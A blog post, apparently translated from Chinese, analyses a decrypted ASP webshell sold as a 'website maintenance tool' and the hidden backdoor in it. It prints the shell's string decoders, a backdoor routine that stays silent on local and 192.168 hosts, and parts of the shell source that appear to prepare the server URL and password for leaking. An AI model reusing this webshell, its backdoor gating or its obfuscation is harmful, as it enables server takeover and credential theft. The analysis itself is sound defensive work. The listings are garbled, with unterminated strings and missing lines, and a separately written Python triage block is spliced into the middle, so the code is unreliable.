
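Full analysis of the decrypted "奥运专版网站维护工具(加强版)" (Olympic Special Edition Website Maintenance Tool, Enhanced Edition) and its backdoor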

原创天空 | admin | 9682 views | indexed | 0 comments

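The interface of this shell is actually quite nice, clean and understated. Unfortunately, it still carries a sizeable backdoor.

The program's encryption is fairly complex: besides the usual VBScript.Encode encoding, it uses at least three custom encoding functions. The decoding functions for these three are: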

' Reverse the string, then restore double quotes (/*/) and line breaks (\*\)
Function MorfiCoder(Code)
MorfiCoder = Replace(Replace(StrReverse(Code),"/*/", Chr(34)),"\*\", vbCrLf)
End Function
' Restore double quotes (`), then rebuild the string back to front; ~ marks a line break
Function UZSS(objstr)
objstr = Replace(objstr, "`", """"):For i = 1 To Len(objstr):If Mid(objstr, i, 1) <> "~" Then
NewStr = Mid(objstr, i, 1) & NewStr
Else
NewStr = vbCrLf & NewStr
End If
Next
UZSS = NewStr
End Function
' Keyed decoder: shifts each printable character (32..126) by an offset taken from Rnd
Function MorfiCoder1(password, MorfiCode)
Dim MIN_Morfi,MAX_Morfi,NUM_Morfi,offset,Str_len,i,code,To_TxT
MIN_Morfi = 32
MAX_Morfi = 126
NUM_Morfi = MAX_Morfi - MIN_Morfi + 1
offset = password
' Rnd -1 followed by Randomize makes the Rnd sequence repeatable for a given password
Rnd -1
Randomize offset
MorfiCode = Replace(MorfiCode, "/*/", Chr(34))
Str_len = Len(MorfiCode)
For i = 1 To Str_len
Code = Asc(Mid(MorfiCode, i, 1))
If Code >= MIN_Morfi And Code <= MAX_Morfi Then
Code = Code - MIN_Morfi
offset = Int((NUM_Morfi + 1) * Rnd)
Code = ((Code - offset) Mod NUM_Morfi)
If Code < 0 Then Code = Code + NUM_Morfi
Code = Code + MIN_Morfi
To_TxT = To_TxT & Chr(Code)
MorfiCoder1 = Replace(To_TxT, "\*\", vbCrLf)
Else
To_TxT = To_TxT & Chr(Code)
MorfiCoder1 = Replace(To_TxT, "\*\", vbCrLf)
End If
Next
End Function

The backdoor in this shell is almost identical to the ones in the previous shells.
The code is:

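sub Tallax()
Dim MorfiCode
' (the string assigned to morfi on the next line is missing from the page)
morfi="
' Blank the payload when the shell is served from loopback, a 192.168.x.x address or localhost
if instr(Request.ServerVariables("SERVER_NAME"),"127.0.0.1")<>0 then morfi=""
if instr(Request.ServerVariables("SERVER_NAME"),"192.168.")<>0 then morfi=""
if instr(Request.ServerVariables("SERVER_NAME"),"localhost")<>0 then morfi=""
echo morfi
end sub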

It is a Sub procedure, and it is the first thing called when the main window is displayed:

Function MainForm()
call Tallax()
echo"


echo"
echo"
echo"


……….

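This backdoor can tell whether the shell is running locally, on an internal network, or on the public Internet. If the shell is not on the public Internet, the backdoor does not bother with it.
Decrypted, the backdoor address is

It uses the same parameters as in the previous articles, the same method of receiving the data, and a similar domain name.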
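For offline triage, the two keyless decoders above can be ported to Python so that packed strings from a sample are recovered without running the shell. The block below is an added example, not code from the original post; it also lists the SERVER_NAME markers that Tallax() checks. MorfiCoder1 is not ported because its output depends on VBScript's Rnd sequence, and the names morfi_decode, uzss_decode, gate_markers and the sample data are assumptions made for the example.

```python
import re

CRLF = "\r\n"

def morfi_decode(code: str) -> str:
    """Python port of MorfiCoder: reverse, then /*/ -> '"' and \\*\\ -> CRLF."""
    return code[::-1].replace("/*/", '"').replace("\\*\\", CRLF)

def uzss_decode(packed: str) -> str:
    """Python port of UZSS: '`' -> '"', then prepend char by char, '~' -> CRLF."""
    out = ""
    for ch in packed.replace("`", '"'):
        out = (CRLF if ch == "~" else ch) + out
    return out

# Matches the check used in Tallax():
#   instr(Request.ServerVariables("SERVER_NAME"),"<marker>")
GATE_RE = re.compile(
    r'instr\s*\(\s*Request\.ServerVariables\s*\(\s*"SERVER_NAME"\s*\)'
    r'\s*,\s*"([^"]*)"\s*\)',
    re.IGNORECASE,
)

def gate_markers(asp_text: str) -> list[str]:
    """Return the host markers a decoded script compares SERVER_NAME against."""
    return [m.group(1) for m in GATE_RE.finditer(asp_text)]

# Constructed sample: the three checks from the Tallax listing, packed in both
# formats so the decoders have something to work on. No real payload is included.
PLAIN = CRLF.join(
    f'if instr(Request.ServerVariables("SERVER_NAME"),"{h}")<>0 then morfi=""'
    for h in ("127.0.0.1", "192.168.", "localhost")
)
PACKED_MORFI = PLAIN.replace('"', "/*/").replace(CRLF, "\\*\\")[::-1]
PACKED_UZSS = PLAIN.replace('"', "`").replace(CRLF, "~")[::-1]

if __name__ == "__main__":
    for name, text in (("MorfiCoder", morfi_decode(PACKED_MORFI)),
                       ("UZSS", uzss_decode(PACKED_UZSS))):
        print(name, "->", gate_markers(text))
```

The check is a substring match on SERVER_NAME for only those three markers, so a lab host reached under any other name or address counts as external to the shell; analyse a sample with outbound network access blocked.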
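The decrypted source is posted below; the encrypted file and the plaintext file are packaged and uploaded as an attachment.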

<%@ LANGUAGE = VBScript %>
<%
UserPass="20080808" 'PASSWORD
VerName="奥运专版网站维护工具(加强版)" 'copyright
Ver="注:请小心使用此软件。如误操作造成不良后果,作者概不负责" 'disclaimer
StateName="" 'status bar text
Server.ScriptTimeout=999999999:Response.Buffer =true:On Error Resume Next
sub ShowErr()
Dim MorfiCode
If Err Then
echo"

 " & Err.Description & "


Err.Clear
Response.Flush
End If
end sub
Function MorfiCoder(Code)
MorfiCoder = Replace(Replace(StrReverse(Code),"/*/", Chr(34)),"\*\", vbCrLf)
End Function
Sub echo(str)
response.write(str)
End Sub
function face(Color,Siz,Var)
if Siz=0 then
siz=""
else
siz=" size='"&Siz&"'"
end if
face=""&Var&"
End function
Dim kge
kge="


posurl="http"
sub Css()
echo "


end sub
Function UZSS(objstr)
objstr = Replace(objstr, "`", """"):For i = 1 To Len(objstr):If Mid(objstr, i, 1) <> "~" Then
NewStr = Mid(objstr, i, 1) & NewStr
Else
NewStr = vbCrLf & NewStr
End If
Next
UZSS = NewStr
End Function
sub Tallax()
Dim MorfiCode
morfi="
if instr(Request.ServerVariables("SERVER_NAME"),"127.0.0.1")<>0 then morfi=""
if instr(Request.ServerVariables("SERVER_NAME"),"192.168.")<>0 then morfi=""
if instr(Request.ServerVariables("SERVER_NAME"),"localhost")<>0 then morfi=""
echo morfi
end sub
Function MorfiCoder1(password, MorfiCode)
Dim MIN_Morfi,MAX_Morfi,NUM_Morfi,offset,Str_len,i,code,To_TxT
MIN_Morfi = 32
MAX_Morfi = 126
NUM_Morfi = MAX_Morfi - MIN_Morfi + 1
offset = password
Rnd -1
Randomize offset
MorfiCode = Replace(MorfiCode, "/*/", Chr(34))
Str_len = Len(MorfiCode)
For i = 1 To Str_len
Code = Asc(Mid(MorfiCode, i, 1))
If Code >= MIN_Morfi And Code <= MAX_Morfi Then
Code = Code - MIN_Morfi
offset = Int((NUM_Morfi + 1) * Rnd)
Code = ((Code - offset) Mod NUM_Morfi)
If Code < 0 Then Code = Code + NUM_Morfi
Code = Code + MIN_Morfi
To_TxT = To_TxT & Chr(Code)
MorfiCoder1 = Replace(To_TxT, "\*\", vbCrLf)
Else
To_TxT = To_TxT & Chr(Code)
MorfiCoder1 = Replace(To_TxT, "\*\", vbCrLf)
End If
Next
End Function
sub ResPath()
Dim MorfiCode
If Session("web2a2dmin") <> UserPass Then
If Request("Pass")="UserPass" Then
Session("web2a2dmin") = UserPass
Response.Redirect URL
end if
end if
end sub
Function RePath(S)
RePath=Replace(S,"\","\\")
End Function
Function RRePath(S)
RRePath=Replace(S,"\\","\")
End Function
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
FolderPath=Request("FolderPath")
FName=Request("FName")
BackUrl="

返回

echo"
echo""&vername&" - "&ServerIP&"
echo"


…………………………………………………

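Encrypted file
Click to download this file
Originally, in the spirit of sharing, I published the decrypted source code, but many friends advised me against it, so the decrypted file will not be published.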


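金刀客博客, all rights reserved. Unless otherwise noted, all content is original. This site is licensed under BY-NC-SA. When reposting, please credit: Full analysis of the decrypted "奥运专版网站维护工具(加强版)" (Olympic Special Edition Website Maintenance Tool, Enhanced Edition) and its backdoor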